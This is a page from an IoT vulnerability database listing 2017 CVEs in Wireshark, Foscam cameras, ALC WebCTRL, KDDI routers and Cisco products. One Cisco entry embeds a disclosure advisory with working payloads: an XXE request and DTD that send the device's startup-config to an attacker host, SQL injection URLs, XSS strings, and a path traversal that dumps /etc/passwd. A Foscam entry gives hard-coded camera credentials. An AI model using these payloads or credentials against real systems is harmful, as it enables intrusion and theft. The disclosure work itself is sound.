VARIoT IoT vulnerabilities database

Affected products: vendor, model and version
CWE format is 'CWE-number'. Threat type can be: remote or local
Look up free text in title and description

VAR-201706-0813 CVE-2017-9766 Wireshark 'profinet/packet-dcerpc-pn-io.c' Denial of service vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
In Wireshark 2.2.7, PROFINET IO data with a high recursion depth allows remote attackers to cause a denial of service (stack exhaustion) in the dissect_IODWriteReq function in plugins/profinet/packet-dcerpc-pn-io.c. Wireshark (formerly known as Ethereal) is a suite of network packet analysis software developed by the Wireshark team. The function of the software is to intercept network packets and display detailed data for analysis. A security vulnerability exists in the \342\200\230dissect_IODWriteReq\342\200\231 function of the plugins/profinet/packet-dcerpc-pn-io.c file in Wireshark version 2.2.7. Wireshark is prone to a remote denial-of-service vulnerability because it fails to properly handle certain types of packets. Attackers can exploit this issue to crash the affected application, resulting in denial-of-service conditions. Wireshark 2.2.7 is vulnerable; other versions may also be affected
VAR-201805-0357 CVE-2017-9637 Schneider Electric Ampla MES Information Disclosure Vulnerability CVSS V2: 1.9
CVSS V3: 4.1
Severity: MEDIUM
Schneider Electric Ampla MES 6.4 provides capability to interact with data from third party databases. When connectivity to those databases is configured to use a SQL user name and password, an attacker may be able to sniff details from the connection string. Schneider Electric recommends that users of Ampla MES versions 6.4 and prior should upgrade to Ampla MES version 6.5 as soon as possible. Ampla Manufacturing Execution System (MES) is a manufacturing execution system for on-site production management in production plants and production plants by Schneider Electric. information. Local attackers can exploit these issues to obtain sensitive information which may aid in further attacks
VAR-201805-0356 CVE-2017-9635 Schneider Electric Ampla MES Weak password vulnerability CVSS V2: 1.9
CVSS V3: 3.9
Severity: LOW
Schneider Electric Ampla MES 6.4 provides capability to configure users and their privileges. When Ampla MES users are configured to use Simple Security, a weakness in the password hashing algorithm could be exploited to reverse the user's password. Schneider Electric recommends that users of Ampla MES versions 6.4 and prior should upgrade to Ampla MES version 6.5 as soon as possible. Schneider Electric Ampla MES Contains a cryptographic strength vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Ampla Manufacturing Execution System (MES) is a manufacturing execution system for on-site production management in production plants and production plants by Schneider Electric. Local attackers can exploit these issues to obtain sensitive information which may aid in further attacks
VAR-201708-1418 CVE-2017-9633 Continental TCU Remote code execution vulnerability CVSS V2: 8.3
CVSS V3: 8.8
Severity: HIGH
An Improper Restriction of Operations within the Bounds of a Memory Buffer issue was discovered in the Continental AG Infineon S-Gold 2 (PMB 8876) chipset on BMW several models produced between 2009-2010, Ford a limited number of P-HEV vehicles, Infiniti 2013 JX35, Infiniti 2014-2016 QX60, Infiniti 2014-2016 QX60 Hybrid, Infiniti 2014-2015 QX50, Infiniti 2014-2015 QX50 Hybrid, Infiniti 2013 M37/M56, Infiniti 2014-2016 Q70, Infiniti 2014-2016 Q70L, Infiniti 2015-2016 Q70 Hybrid, Infiniti 2013 QX56, Infiniti 2014-2016 QX 80, and Nissan 2011-2015 Leaf. A vulnerability in the temporary mobile subscriber identity (TMSI) may allow an attacker to access and control memory. This may allow remote code execution on the baseband radio processor of the TCU. BMW , Ford , Infiniti ,and Nissan On multiple models of Continental AG Infineon S-Gold 2 (PMB 8876) The chipset contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The TCU is a 2G modem commonly used in modern cars produced by Continental AG to transmit data between cars and remote management tools such as web panels and mobile applications. Continental AG Infineon S-Gold 2 (PMB 8876) is prone to a remote code-execution vulnerability and a stack-based buffer-overflow vulnerability; fixes are available. An attacker can exploit these issues to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions
VAR-201708-1398 CVE-2017-9640 ALC WebCTRL i-Vu/SiteScan Web Path traversal vulnerability CVSS V2: 6.5
CVSS V3: 6.3
Severity: MEDIUM
A Path Traversal issue was discovered in Automated Logic Corporation (ALC) ALC WebCTRL, i-Vu, SiteScan Web prior to 6.5; ALC WebCTRL, SiteScan Web 6.1 and prior; ALC WebCTRL, i-Vu 6.0 and prior; ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior; and ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior. An authenticated attacker may be able to overwrite files that are used to execute code. This vulnerability does not affect version 6.5 of the software. ALC WebCTRL , i-Vu ,and SiteScan Web Contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ALC WebCTRL is a building automation platform. Multiple Automated Logic Corporation Products are prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability. An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and run it in the context of the webserver process. WebCTRL®, Automated Logic's web-based building automationsystem, is known for its intuitive user interface and powerful integrationcapabilities. It allows building operators to optimize and manageall of their building systems - including HVAC, lighting, fire, elevators,and security - all within a single HVAC controls platform. It's everythingthey need to keep occupants comfortable, manage energy conservation measures,identify key operational problems, and validate the results.WebCTRL suffers from an authenticated arbitrary code execution vulnerability. The issue is caused due to the improper verification when uploading Add-on (.addons or .war) files using the uploadwarfile servlet. This can be exploited to execute arbitrary code by uploading a malicious web archive file that will run automatically and can be accessed from within the webroot directory. Additionaly, an improper authorization access control occurs when using the 'anonymous' user. By specification, the anonymous user should not have permissions or authorization to upload or install add-ons. The anonymous user was removed from version 6.5 of WebCTRL.Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601)Apache-Coyote/1.1Apache Tomcat/7.0.42CJServer/1.1Java/1.7.0_25-b17Java HotSpot Server VM 23.25-b01Ant 1.7.0Axis 1.4Trove 2.0.2Xalan Java 2.4.1Xerces-J 2.6.1. The vulnerability exist due to the improper permissions,with the 'M' flag (Modify) or 'C' flag (Change) for 'Authenticated Users' group.The application suffers from an unquoted search path issue as well impacting the service'WebCTRL Service' for Windows deployed as part of WebCTRL server solution. This couldpotentially allow an authorized but non-privileged local user to execute arbitrarycode with elevated privileges on the system. A successful attempt would require thelocal user to be able to insert their code in the system root path undetected by theOS or other security applications where it could potentially be executed duringapplication startup or reboot. If successful, the local user’s code would executewith the elevated privileges of the application.Tested on: Microsoft Windows 7 Professional SP1 (EN). Desc: The vulnerability is triggered by an authenticated user that can use the manualcommand console in the management panel of the affected application. The ManualCommand() function in ManualCommand.js allows users to perform additional diagnostics and settings overview by using pre-defined set of commands. This can be exploited by using the echo command to write and/or overwrite arbitrary files on the system including directory traversal throughout the system
VAR-201708-1399 CVE-2017-9644 ALC WebCTRL i-Vu/SiteScan Web Unreferenced Search Path Vulnerability CVSS V2: 6.9
CVSS V3: 7.0
Severity: HIGH
An Unquoted Search Path or Element issue was discovered in Automated Logic Corporation (ALC) ALC WebCTRL, i-Vu, SiteScan Web 6.5 and prior; ALC WebCTRL, SiteScan Web 6.1 and prior; ALC WebCTRL, i-Vu 6.0 and prior; ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior; and ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior. An unquoted search path vulnerability may allow a non-privileged local attacker to change files in the installation directory and execute arbitrary code with elevated privileges. ALC WebCTRL , i-Vu ,and SiteScan Web Contains vulnerabilities related to unquoted search paths or elements.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ALC WebCTRL is a building automation platform. Multiple Automated Logic Corporation (ALC) Products are prone to local privilege-escalation vulnerability. WebCTRL®, Automated Logic's web-based building automationsystem, is known for its intuitive user interface and powerful integrationcapabilities. It allows building operators to optimize and manageall of their building systems - including HVAC, lighting, fire, elevators,and security - all within a single HVAC controls platform. It's everythingthey need to keep occupants comfortable, manage energy conservation measures,identify key operational problems, and validate the results.WebCTRL suffers from an authenticated arbitrary code execution vulnerability. The issue is caused due to the improper verification when uploading Add-on (.addons or .war) files using the uploadwarfile servlet. This can be exploited to execute arbitrary code by uploading a malicious web archive file that will run automatically and can be accessed from within the webroot directory. Additionaly, an improper authorization access control occurs when using the 'anonymous' user. By specification, the anonymous user should not have permissions or authorization to upload or install add-ons. In this case, when using the anonymous user, an attacker is still able to upload a malicious file via insecure direct object reference and execute arbitrary code. The anonymous user was removed from version 6.5 of WebCTRL.Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601)Apache-Coyote/1.1Apache Tomcat/7.0.42CJServer/1.1Java/1.7.0_25-b17Java HotSpot Server VM 23.25-b01Ant 1.7.0Axis 1.4Trove 2.0.2Xalan Java 2.4.1Xerces-J 2.6.1. The vulnerability exist due to the improper permissions,with the 'M' flag (Modify) or 'C' flag (Change) for 'Authenticated Users' group.The application suffers from an unquoted search path issue as well impacting the service'WebCTRL Service' for Windows deployed as part of WebCTRL server solution. A successful attempt would require thelocal user to be able to insert their code in the system root path undetected by theOS or other security applications where it could potentially be executed duringapplication startup or reboot
VAR-201805-0354 CVE-2017-9641 OSIsoft PI Coresight Cross-Site Request Forgery Vulnerability CVSS V2: 6.8
CVSS V3: 8.8
Severity: HIGH
PI Coresight 2016 R2 contains a cross-site request forgery vulnerability that may allow access to the PI system. OSIsoft recommends that users upgrade to PI Vision 2017 or greater to mitigate this vulnerability. Other attacks are also possible. OSIsoft PI Coresight 2016 R2 and earlier are vulnerable
VAR-201706-0439 CVE-2016-8731 Foscam C1 Indoor HD Vulnerabilities related to the use of hard-coded credentials in cameras CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
Hard-coded FTP credentials (r:r) are included in the Foscam C1 running firmware 1.9.1.12. Knowledge of these credentials would allow remote access to any cameras found on the internet that do not have port 50021 blocked by an intermediate device. Foscam C1 Indoor HD The camera contains a vulnerability related to the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. FoscamC1 is a wireless IP camera product from China Foscom (FOSCAM). There is a security vulnerability in FoscamC1 using firmware version 1.9.1.12. Foscam C1 Webcam is prone to an authentication-bypass vulnerability. An attacker can exploit this issue to gain unauthorized access or obtain sensitive information; this may lead to further attacks. ### Tested Versions Foscam C1 Firmware Version 1.9.1.12 ### Product URLs Foscam ### CVSSv3 Score 9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H ### CWE CWE-259: Use of Hard-coded Password ### Details The file found at '/mtd/app/bin/ftpd/pureftpd.passwd' contains the following hash: ``` r:$1$whR6Mhk0$FR1VT/mX5D/qwRsgCkHLO.:1001:1001::/mnt/sd/./:::::::::::: ``` This hash resolves to a simple user/pass combo of 'r:r'. The user/pass of r:r permits anyone to log into a Foscam camera and have full read/write to the mounted Micro-SD card, which contains .avi videos and .jpg snapshots. If the camera has a microphone, the .avi videos will have audio recording as well. An attacker armed with this knowledge can connect remotely to the..
VAR-201706-0488 CVE-2017-2805 Foscam C1 Indoor HD Camera Web Management interface vulnerability related to out-of-bounds writing CVSS V2: 7.5
CVSS V3: 9.8
Severity: CRITICAL
An exploitable stack-based buffer overflow vulnerability exists in the web management interface used by the Foscam C1 Indoor HD Camera. A specially crafted http request can cause a stack-based buffer overflow resulting in overwriting arbitrary data on the stack frame. An attacker can simply send an http request to the device to trigger this vulnerability. FoscamIPVideoCamera is a wireless HD IP camera from Foscam, China. Foscam IP Video Camera is prone to multiple remote code-execution vulnerabilities. An attacker can leverage these issues to execute arbitrary code in the affected device
VAR-201706-0494 CVE-2017-2830 Foscam C1 Indoor HD Camera buffer error vulnerability CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
An exploitable buffer overflow vulnerability exists in the web management interface used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.37. A specially crafted HTTP request can cause a buffer overflow resulting in overwriting arbitrary data. An attacker can simply send an HTTP request to the device to trigger this vulnerability. FoscamIPVideoCamera is a wireless HD IP camera from Foscam, China. Foscam IP Video Camera is prone to multiple remote code-execution vulnerabilities
VAR-201706-0495 CVE-2017-2831 Foscam C1 Indoor HD Buffer error vulnerability in camera CVSS V2: 5.0
CVSS V3: 7.5
Severity: HIGH
An exploitable buffer overflow vulnerability exists in the web management interface used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.37. A specially crafted HTTP request can cause a buffer overflow resulting in overwriting arbitrary data. An attacker can simply send an HTTP request to the device to trigger this vulnerability. FoscamC1IndoorHDCamera is a wireless HD IP camera from China Foscam. Foscam IP Video Camera is prone to multiple remote code-execution vulnerabilities
VAR-201706-0506 CVE-2017-2851 Foscam C1 Indoor HD Camera Web Buffer error vulnerability in management interface CVSS V2: 6.0
CVSS V3: 7.2
Severity: HIGH
In the web management interface in Foscam C1 Indoor HD cameras with application firmware 2.52.2.37, a specially crafted HTTP request can cause a buffer overflow. FoscamC1IndoorHDCamera is a wireless HD IP camera from China Foscam. An attacker could exploit the vulnerability to overwrite arbitrary data or execute arbitrary code by sending a specially crafted HTTP request. Foscam IP Video Camera is prone to multiple remote code-execution vulnerabilities
VAR-201707-0411 CVE-2017-2183 HOME SPOT CUBE2 vulnerable to OS command injection in clock settings CVSS V2: 5.2
CVSS V3: 8.0
Severity: HIGH
HOME SPOT CUBE2 firmware V101 and earlier allows authenticated attackers to execute arbitrary OS commands via Clock Settings. HOME SPOT CUBE2 provided by KDDI CORPORATION is a wireless LAN router. Taizoh Tsukamoto of Mitsui Bussan Secure Directions, Inc. reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.An arbitrary OS command may be executed by an attacker who can access the management screen of the product. The WebUI is one of the graphical user interfaces. An operating system command injection vulnerability exists in the WebUI in KDDIHOMESPOTCUBE2 using firmware versions 101 and earlier. A remote attacker could exploit this vulnerability to execute arbitrary operating system commands. HOME SPOT CUBE2 is prone to following security vulnerabilities: 1. A buffer-overflow vulnerability 3. Other attacks may also be possible
VAR-201707-0412 CVE-2017-2184 HOME SPOT CUBE2 vulnerable to buffer overflow in WebUI CVSS V2: 5.8
CVSS V3: 8.8
Severity: HIGH
Buffer overflow in HOME SPOT CUBE2 firmware V101 and earlier allows an attacker to execute arbitrary code via WebUI. HOME SPOT CUBE2 provided by KDDI CORPORATION is a wireless LAN router. Taizoh Tsukamoto of Mitsui Bussan Secure Directions, Inc. reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.Arbitrary code may be executed by an attacker who can access the management screen of the product. The WebUI is one of the graphical user interfaces. Multiple remote command injection vulnerabilities 2. A buffer-overflow vulnerability 3. Other attacks may also be possible
VAR-201707-0413 CVE-2017-2185 HOME SPOT CUBE2 vulnerable to OS command injection in WebUI CVSS V2: 5.2
CVSS V3: 8.8
Severity: HIGH
HOME SPOT CUBE2 firmware V101 and earlier allows authenticated attackers to execute arbitrary OS commands via WebUI. HOME SPOT CUBE2 provided by KDDI CORPORATION is a wireless LAN router. Taizoh Tsukamoto of Mitsui Bussan Secure Directions, Inc. reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.An arbitrary OS command may be executed by an attacker who can access the management screen of the product. The WebUI is one of the graphical user interfaces. An operating system command injection vulnerability exists in the WebUI in KDDIHOMESPOTCUBE2 using firmware versions 101 and earlier. A remote attacker could exploit this vulnerability to execute arbitrary operating system commands. HOME SPOT CUBE2 is prone to following security vulnerabilities: 1. A buffer-overflow vulnerability 3. Other attacks may also be possible
VAR-201706-0581 CVE-2017-6662 Cisco PI and EPNM of Web Base user interface XML External entity vulnerabilities CVSS V2: 6.0
CVSS V3: 8.0
Severity: HIGH
A vulnerability in the web-based user interface of Cisco Prime Infrastructure (PI) and Evolved Programmable Network Manager (EPNM) could allow an authenticated, remote attacker read and write access to information stored in the affected system as well as perform remote code execution. The attacker must have valid user credentials. The vulnerability is due to improper handling of XML External Entity (XXE) entries when parsing an XML file. An attacker could exploit this vulnerability by convincing the administrator of an affected system to import a crafted XML file with malicious entries which could allow the attacker to read and write files and execute remote code within the application, aka XML Injection. Cisco Prime Infrastructure software releases 1.1 through 3.1.6 are vulnerable. Cisco EPNM software releases 1.2, 2.0, and 2.1 are vulnerable. Cisco Bug IDs: CSCvc23894 CSCvc49561. Vendors have confirmed this vulnerability Bug ID CSCvc23894 and CSCvc49561 It is released as.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Attackers can exploit this issue to execute arbitrary code, gain access to sensitive information or cause denial-of-service conditions. Cisco Evolved Programmable Network Manager 1.2, 2.0, and 2.1. PI is a set of wireless management solutions through Cisco Prime LAN Management Solution (LMS) and Cisco Prime Network Control System (NCS) technologies; EPNM is a set of network management solutions. SEC Consult Vulnerability Lab Security Advisory < 20170622-0 > ======================================================================= title: XML External Entity Injection (XXE), SQL Injection, Cross Site Scripting, Local File Disclosure product: Cisco Prime Infrastructure vulnerable version: 1.1 through 3.1.6 fixed version: 3.1.6 Update 1 (patch), 3.1.7 (future release) CVE number: CVE-2017-6662, CVE-2017-6698, CVE-2017-6699, CVE-2017-6700 impact: high homepage: http://www.cisco.com/c/en/us/products/cloud-systems-management/prime-infrastructure/index.html found: 2016-11-21 by: P. Morimoto (Office Bangkok) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Cisco Systems, Inc. (known as Cisco) is an American multinational technology conglomerate headquartered in San JosA(c), California, that develops, manufactures, and sells networking hardware, telecommunications equipment, and other high-technology services and products. Through its numerous acquired subsidiaries, such as OpenDNS, Cisco Meraki, and Cisco Jasper, Cisco specializes into specific tech markets, such as Internet of Things (IoT), domain security, and energy management." Source: https://en.wikipedia.org/wiki/Cisco_Systems Business recommendation: ------------------------ SEC Consult recommends to install the latest patch to fix the identified vulnerabilities. Since SEC Consult only performed a short security crash test on this product it is highly recommended to perform a thorough security review as there are indications for further vulnerabilities. Vulnerability overview/description: ----------------------------------- SEC Consult was able to identify some serious vulnerabilities with the low privileged "monitor-only" user. The hashed password of the local admin user can be accessed without authorization. 2) SQL Injection (CVE-2017-6698) The identified SQL injection vulnerability enables an authenticated attacker with low privileges to execute arbitrary SQL commands. 3) Cross site scripting (CVE-2017-6699, CVE-2017-6700) Due to the lack of input validation, an attacker can insert malicious JavaScript code to be executed under a victim's browser context. 4) Local File Disclosure (no CVE assigned) Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed. Proof of concept: ----------------- 1) XML External Entity Injection (CVE-2017-6662) Login with a low privileged user and navigate to Settings > Export > select Format 'PDF' click 'Export'. Make sure the 'Chart' option is selected, this chart uses XML to build SVG images. POST /webacs/prime/ui/dashboard/renderer HTTP/1.1 Host: <CiscoPrimeHost> [...] output-type=pdf&content={"applicationName":"sectest","reportName":"Site","options":{},"timezoneOffset":0,"items":[{"options":{"filters":[],"additionalInfo":[""]},"svgSurface":{"svg":"<%3fxml+version%3d\"1.0\"+encoding%3d\"UTF-8\"%3f><!DOCTYPE x [<!ENTITY %25 foo SYSTEM \"http://<AttackerHost>:1234/sectest.dtd\">%25%66%6f%6f%3b%25%70%61%72%61%6d%31%3b]><svg+xmlns%3alink%3d\"http%3a//www.w3.org/1999/xlink\"+xmlns%3d\"http%3a//www.w3.org/2000/svg\"><defs/><text>%26%65%78%66%69%6c%3b</text></svg>","dims"%3a{"width"%3a0,"height"%3a0}},"csv"%3a"Devices,\"","title"%3a"","timestamp"%3a""}],"noBrandingData"%3atrue,"locale"%3a"en"}&pdfOptions=%7B%22table%22%3Atrue%2C%22chart%22%3Atrue%7D $ cat sectest.dtd <!ENTITY % data SYSTEM "file:///storedconfig/active/startup-config"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://<Attacker>:2121/%data;'>"> $ python -m SimpleHTTPServer 1234 $ wget https://raw.githubusercontent.com/ONsec-Lab/scripts/master/xxe-ftp-server.rb $ ruby xxe-ftp-server.rb FTP. New client connected < USER anonymous < PASS Java1.8.0_66@ > 230 more data please! < TYPE I > 230 more data please! < CWD ! > 230 more data please! < hostname <CiscoPrimeHost> [...] < ! > 230 more data please! < username admin password hash <AdminHashedPassword> > 230 more data please! < CWD role admin > 230 more data please! < ! [...] 2) SQL Injection (CVE-2017-6698) A low privileged user such as "monitor-only" user can read the admin's password hashes via SQL injection. https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/PI_RECENT_LINKS?categoryPath=global%2fPI_RECENT_LINKS<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/syslog_viewer_tutorial?categoryPath=<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/device-rest/getfiltercriteria/device?start=0&count=100&id=<SQL-Injection>&path=%2Froot Some vulnerable entry points require administrator privileges to exploit. https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/PI_HOME_PAGE_SELECTION?categoryPath=<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/corelated-right-tabs?categoryPath=<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/DASHBOARD_CONFIG:com_cisco_xmp_web_page_smartlicense_dashboard?categoryPath=<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/json/userService/getAuditRecordsForGivenRange/?userName=/<SQL-Injection>&ipAddress=/<SQL-Injection>&time=/<SQL-Injection>&auditDescription=/<SQL-Injection>&userGroup=/<SQL-Injection>&activeDomain=/<SQL-Injection> https://<CiscoPrimeHost>/webacs/inventoryRestService/ifm/inventory-rest/getImportTaskStatusDTO/<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/json/jobSchedulerService/getJobDetails/<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/json/jobSchedulerService/getAllJobsCtr/Infrastructure/<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/json/jobSchedulerService/getAllJobs/<SQL-Injection>/Lightweight%20AP%20Operational%20Status Some URLs with this pattern are affected by the SQL injection vulnerability in the JSON field. https://<CiscoPrimeHost>/webacs/rs/preferences/systemPreferencesForNode/default.proxy/ (HTTP POST) { "items": [ "<SQL-Injection>", "ProxyPort", "ProxyUserName", "ProxyPassword", "isProxyEnabled", "isProxyAuthenticated" ] } https://<CiscoPrimeHost>/webacs/rs/preferences/systemPreferencesForNode/default.swim/ (HTTP POST) { "items": [ "<SQL-Injection>", "CCOPassword" ] } 3) Cross site scripting a) Reflected cross site scripting (CVE-2017-6699) https://<CiscoPrimeHost>/webacs/applications/common/jsp/SystemPreferences_Configurable.jsp?taskName=<img+src=x+onerror=alert(/XSS1/)>&confUrl=</ScR</ScRipT>ipT><img+src=x+onerror=alert(/XSS2/)> https://<CiscoPrimeHost>/webacs/applications/inventory/html/ImportJobResults.jsp?taskId=</sc</script>ript><img+src=x+onerror=alert(/XSS1/)>&jobResultPageId='><img+src=x+onerror=alert(/XSS2/)> b) DOM-based cross site scripting (CVE-2017-6700) https://<CiscoPrimeHost>/webacs/index_abs.jsp?theme=prime#pageId=com_cisco_ifm_ui_web_page_job_dashboard_import_view&taskId=<ExistingTaskID>&jobName="><img src=x onerror=alert(/XSS/)>&pageSettings= https://<CiscoPrimeHost>/webacs/loginAction.do?action=login&product=wcs&selectedCategory=en#pageId=com_cisco_ifm_ui_web_page_job_dashboard_detail_view&forceLoad=true&jobType=Infrastructure&workState=Scheduled&parentType=usrDefined&lastRunJobId=<ExistingJobId>&lastRunResultState=Success&jobId=<ExistingJobId>&jobName=Mobility Service Status&jobBreadcrumName="><img src=x onerror=alert(/XSS/)> 4) Local File Disclosure The attacker must be in the super users or admin group in order to exploit this vulnerability. https://<CiscoPrimeHost>/webacs/packetCaptureAction.do?command=download&filename=../../../../../../../../../../../../../../../../../../../../etc/passwd GET /webacs/packetCaptureAction.do?command=download&filename=../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: <CiscoPrimeHost> [...] HTTP/1.1 200 OK Cache-Control: private Expires: Thu, 01 Jan 1970 01:00:00 CET Content-Disposition: attachement; filename="../../../../../../../../../../../../../../../../../../../../etc/passwd.zip" Content-Type: application/zip [...] $ unzip _.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._etc_passwd.zip Archive: _.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._etc_passwd.zip warning: skipped "../" path component(s) in ../../../../../../../../../../../../../../../../../../../../etc/passwd inflating: etc/passwd $ cat etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt [...] Vulnerable / tested versions: ----------------------------- According to information provided by Cisco, the following versions are affected: 1.1 through 3.1.6 SEC Consult tested the following versions which were the most recent ones at the time of discovery: * 3.1.0.0.70 * 3.1.0.0.132 incl. 3.1.4 patch Vendor contact timeline: ------------------------ 2016-11-23: Contacting vendor through psirt@cisco.com. 2016-11-23: Initial response from Cisco PSIRT. 2016-11-24: Additional vulnerabilities added. 2016-12-14: Cisco proposed target date for the fixes for March 2017. 2017-03-03: Cisco postponed target date for the fixes to 31 May 2017. 2017-05-16: Cisco postponed target date for the fixes to 21 June 2017. 2017-06-14: CVEs are assigned to the vulnerabilities. 2017-06-21: Patches available 2017-06-22: Coordinated release of security advisory. Solution: --------- Install the patch version 3.1.6 Update 1. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Pichaya Morimoto / @2017
VAR-201706-0558 CVE-2017-6678 Cisco Virtualized Packet Core-Distributed Instance Software ingress UDP Vulnerability related to resource management in packet processing function CVSS V2: 7.8
CVSS V3: 7.5
Severity: HIGH
A vulnerability in the ingress UDP packet processing functionality of Cisco Virtualized Packet Core-Distributed Instance (VPC-DI) Software 19.2 through 21.0 could allow an unauthenticated, remote attacker to cause both control function (CF) instances on an affected system to reload, resulting in a denial of service (DoS) condition. The vulnerability is due to insufficient handling of user-supplied data by the affected software. An attacker could exploit this vulnerability by sending crafted UDP packets to the distributed instance (DI) network addresses of both CF instances on an affected system. A successful exploit could allow the attacker to cause an unhandled error condition on the affected system, which would cause the CF instances to reload and consequently cause the entire VPC to reload, resulting in the disconnection of all subscribers and a DoS condition on the affected system. This vulnerability can be exploited via IPv4 traffic only. Cisco Bug IDs: CSCvc01665 CSCvc35565. Vendors have confirmed this vulnerability Bug ID CSCvc01665 and CSCvc35565 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. Cisco Virtualized Packet Core (VPC) is a StarOS version classified by product. The following products and versions are affected: Cisco Virtualized Packet Core-Distributed Instance Software Release N5.1, Release N5.0, Release N4.7, Release N4.6, Release N4.5, Release N4.2, Release N4.0
VAR-201707-0915 CVE-2017-6705 Cisco Prime Collaboration Provisioning Vulnerability in which important information is obtained in the file system of the tool CVSS V2: 2.1
CVSS V3: 5.5
Severity: MEDIUM
A vulnerability in the filesystem of the Cisco Prime Collaboration Provisioning tool could allow an authenticated, local attacker to acquire sensitive information. More Information: CSCvc82973. Known Affected Releases: 12.1. This issue is being tracked by Cisco bug ID CSCvc82973 . The tool provides IP communications services capabilities for IP telephony, voice mail, and unified communications environments
VAR-201707-0916 CVE-2017-6706 Cisco Prime Collaboration Provisioning Vulnerability in collecting important information in tool logging subsystem CVSS V2: 3.6
CVSS V3: 5.1
Severity: MEDIUM
A vulnerability in the logging subsystem of the Cisco Prime Collaboration Provisioning tool could allow an unauthenticated, local attacker to acquire sensitive information. More Information: CSCvd07260. Known Affected Releases: 12.1. Vendors have confirmed this vulnerability Bug ID CSCvd07260 It is released as.A local attacker could gain valuable information. An attacker can exploit this issue to obtain sensitive information that may aid in further attacks. This issue is being tracked by Cisco bug ID CSCvd07260. The tool provides IP communications services capabilities for IP telephony, voice mail, and unified communications environments. The logging subsystem is one of the logging subsystems. The vulnerability stems from the fact that the program records sensitive information about user operations
VAR-201707-0925 CVE-2017-6715 Cisco Firepower Management Center of Web Cross-site scripting vulnerability in the framework CVSS V2: 3.5
CVSS V3: 5.4
Severity: MEDIUM
A vulnerability in the web framework of Cisco Firepower Management Center could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web interface. Affected Products: Cisco Firepower Management Center Releases 5.4.1.x and prior. More Information: CSCuy88951. Known Affected Releases: 5.4.1.6. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. This issue is being tracked by Cisco Bug ID CSCuy88951